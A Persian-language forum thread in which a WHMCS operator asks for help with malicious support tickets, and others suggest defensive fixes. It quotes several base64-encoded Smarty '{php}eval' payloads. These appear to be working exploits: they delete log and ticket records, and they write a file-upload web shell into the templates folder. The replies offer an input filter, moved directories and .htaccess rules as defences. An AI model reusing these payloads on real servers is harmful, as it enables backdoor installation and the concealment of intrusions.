مشکل شل و ویروس در whmcs

سلام
من از سیستم whmcs استفاده می کنم .
جدیدا تیکت هایی ارسال می شوند که محتوا آن به صورت کد شده هستند در پایان محتوا را برای شما قرار می دهم ببینید می توانید دی کد کنید .
آیا این نوع تیکت ها حمله هکر ها می باشد؟
چگونه میشوند جلوی این کار رو گرفت؟
البته من آی پی ها رو مسدود می کنم ولی باز از یک آی پی دیگر وارد می شوند آی پی ها از کشور های عربی است
چگونه می توانم در سیتم تنظیم کنم که برای ارسال تیکت باید حتما ثبت نام کنند
ممنونم

کد:

---

{php}eval(base64_decode('aW5jbHVkZSgnY29uZmlndXJhdGlvbi5waHAnKTsNCiRkYj1teXNxbF9jb25uZWN0KCRkYl9ob3N0LCRkYl91c2VybmFtZSwkZGJfcGFzc3dvcmQpIG9yIGRpZSgiQ2FuJ3Qgb3BlbiBjb25uZWN0aW9uIHRvIE15U1FMIik7DQpteXNxbF9zZWxlY3RfZGIoJGRiX25hbWUpIG9yIGRpZSgiQ2FuJ3Qgc2VsZWN0IGRhdGFiYXNlIik7DQokZGVsZXRlID0iREVMRVRFIGZyb20gdGJsdGlja2V0cyBXSEVSRSB0aXRsZSBsaWtlIDB4MjU3QjcwNjg3MDdEMjU7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUpOw0KJGRlbGV0ZTIgPSJERUxFVEUgZnJvbSB0YmxhY3Rpdml0eWxvZyAgV0hFUkUgaXBhZGRyPSciLiRfU0VSVkVSWydSRU1PVEVfQUREUiddLiInOyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlMik7'));{/php}

---

کد:

---

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

---

کد:

---

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

---

من هاست و رو اسکن کردم
یک فایل تو پوشه templates_c در روت اصلی به نام PHP.Shell-38 وجود داشت.
البته یک تیکت دیگه ای هم اومد با محتوا کد های کد شده .
سوالم اینه که به چه صورت این فایل در این فولدر قرار گرفته
قبلا هم در همین پوشه یک فایلی بود که آنتی ویروس نود 32 شناخت ولی سی پنل کاری انجام نداد
ممنون میشوم بفرمایید که به چه صورت این فایل قرار گرفته و دیگر اینکه چه کارهایی باید انجام بدم تا دیگر چنین مشکل هایی پیش نیاد
با تشکر

العان محتوا پوشه templates_c را زیپ کردم پس از دانلود با نود 32 اسکن کردم متاسفانه 4 فایل تروجان با نام های
Kryptik.AB trojan که 3 نوع با این نام
WebShell.NAA trojan و 1 فایل به این نام وجو دارد
لطفا کمک کنید

تیکت ارسالی رو به قسمت جلوگیری اسپم ارسال کنید تا اگه دوباره ارسال شد فایده ای نداشته باشه

بله این کارو کردم.
از دیروز دارم همین کارو میکنم.
ولی خوب آی پی رو تغییر میده
فقط نمیدونم چجوری اومده تو پوشه templates_c
دسترسی باید رو چند باشه ؟
ممنونم میشوم بفرمایی چه اقداماتی باید انجام بدم تا مشکلی پیش نیاد.
با تشکر

نقل قول:

---

نوشته اصلی توسط parsrayaneh

بله این کارو کردم.
از دیروز دارم همین کارو میکنم.
ولی خوب آی پی رو تغییر میده
فقط نمیدونم چجوری اومده تو پوشه templates_c
دسترسی باید رو چند باشه ؟
ممنونم میشوم بفرمایی چه اقداماتی باید انجام بدم تا مشکلی پیش نیاد.
با تشکر

---

اطلاعات تکمیلی و نحوه برطرف شدن مشکل
Further Security Steps - WHMCS Documentation

من این کار ها رو قبلا انجام دادم
نمیدونم از کجا وارد شده
ممنون می شوم دوستان تجربه های خودشون رو بگن

منم همین مشکلُ دارم متاسفانه ...
راه حل خوبی تاحالا نیافتم

سلام

بهترین راه حل اینه که ای پی های ارسال کننده هارو از سرور بن کنید
یا میشه برای یک مدت کل ای پی های عربستان رو بن کرد

موفق باشید

از کجا این آپی ها را تهیه کنم ؟

سلام

اگر میخواهید تک ای پی بن کنید همون تیکتها که میاد ای پی هم توش زده
برای بستن کلی هم رنج های ای پی رو باید تهیه کنید که اگر اشتباه نکنم اون هم یک سری رنج داره که مثلا از 255.555.555.555 تا.... میبنده در این مورد خودم تست نکردم اما میشه

ممنون میشم دوستان این آیپی ها رو ببزارن اینجا تا استفاده کنیم
حقیقتش خیلی از دوستان هستند که این مشکل رو دارند.
اگه میشه آی پی ها رو قرار بدید.
با تشکر

در فایل کانفیگ قبل از

نقل قول:

---

?>

---

بزنید

نقل قول:

---

foreach ($_REQUEST as $value)
{
$pattern = strtolower($value);
$pattern = preg_replace('/\s+/', '', $pattern);
if(strpos($pattern, "{php}") !== false)
die("access denied");
}

---

با این کار دیگه نمیتونه تیکت که توش php هست رو بفرسته
و دوم سه فولدر
downloads
attachments
templates_c
ببرید قبل از public_html
و بعد قبل از این کد های بالا در فایل کانفیگ بزنید

نقل قول:

---

$templates_compiledir = "/home/username/templates_c/";
$attachments_dir = "/home/username/attachments/";
$downloads_dir = "/home/username/downloads/";

---

به جای
username
نام کاربری سیپنلتونو بزنید

ممنونم
فقط یه چیزی
من این کد رو قبلا گذاشته بودم
چرا باز تیکت پی اچ پی برام اومد
به چه صورت میتونم شل ها را پیدا کنم
آخه آنتی ویروس فقط شل های ران شده را پیدا میکنه
ممنون میشم کمک کنید

شما این کارو بکن همین کد رو بذار امکان ارسال نیست الان بفرمایید ارسال کنید
clients.mizbansite.com

بله درسته
ارسال نشد ولی چرا ......
برای پیدا کردن شل دوستان پیشنهادی ندارند.
من پچها را دریافت کردم و نصب کردم.
اگه راهی هست بفرمایید.
اگر هم مشکلی نیست آی پی های کشورهای عربی هم بدید ممنون میشم.
برای اینکه فقط یوزها دسترسی داشته باشند و تیکت ارسال کنند کجا رو باد تغییر داد

نگران نباش
آخرین نسخه را نصب کن
یادت باشه فایل
fanction.php
رو فقط باید داخل پوشه include داشته باشی از جای دیگه حذف کن
او دو کار هم انجام بدین عمرا هک نمیشید مخصوصا بردن پوشه ها به قبل از
public
گیرم شل رو بریزه
وقتی این پوشه ها در دسترس نیستن نمیتونه فراخوانی کنه

ممنونم
ولی اگه بشه فهمید از کجا ران شدن خیلی خوب میشه
من قبلا یک افزونه بانکی نصب کردم برای خود پاسارگاد بود از سایتش گرفتم.
حتی بعد از حذفم باز تو قسمت ماژول پرداخت هست .
نمیدونم یعنی اون شل داشته ؟؟؟

---------- Post added at 08:31 PM ---------- Previous post was at 08:27 PM ----------

من یک کار دیگه ام کردم که میگم دوستان انجام بدن امنیت هم بالا میره
در پوشه ادمینم (البته تغییر نام داده شده)
یک فایل .htaccess ایجاد کردم و در آن کد زیر را قرار دادم

کد:

---

order deny,allow
allow from x
allow from  y
deny from all

---

و در قسمت x و y فقط آی پی هایی را گذاشتم که از آنجا کانکت می شم
البته برای کسانی که از وایمکس استفاده می کنند خوب نیست چرا که هر بار آی پی ها تغییر می کنند

بهترین کار اینه که کلا سیستم تیکت رو لغو کنی

من کلی از این تیکت ها دریافت می کردم

1 بار هم هک شدم

بهترین تصمیم رو گرفتم

دپارتمان پشتیبانی یا همون تیک ها رو حذف کردم و الان کسی دیگه نمی تونه تیکت بده فقط با ایمیل کار مشتری رو راه میندازم

با نصب پچ امنیتی و انتقال
downloads
attachments
templates_c
به قبل از public_html مشکل هک شدن حل میشه

نقل قول:

---

نوشته اصلی توسط maryam1

در فایل کانفیگ قبل از

بزنید

با این کار دیگه نمیتونه تیکت که توش php هست رو بفرسته
و دوم سه فولدر
downloads
attachments
templates_c
ببرید قبل از public_html
و بعد قبل از این کد های بالا در فایل کانفیگ بزنید

به جای
username
نام کاربری سیپنلتونو بزنید

---

من به صورت زیر زدم لطفا چک کنید ببینید درسته ؟

کد:

---

<?php
foreach ($_REQUEST as $value)
{
$pattern = strtolower($value);
$pattern = preg_replace('/\s+/', '', $pattern);
if(strpos($pattern, "{php}") !== false)
die("access denied");
}

---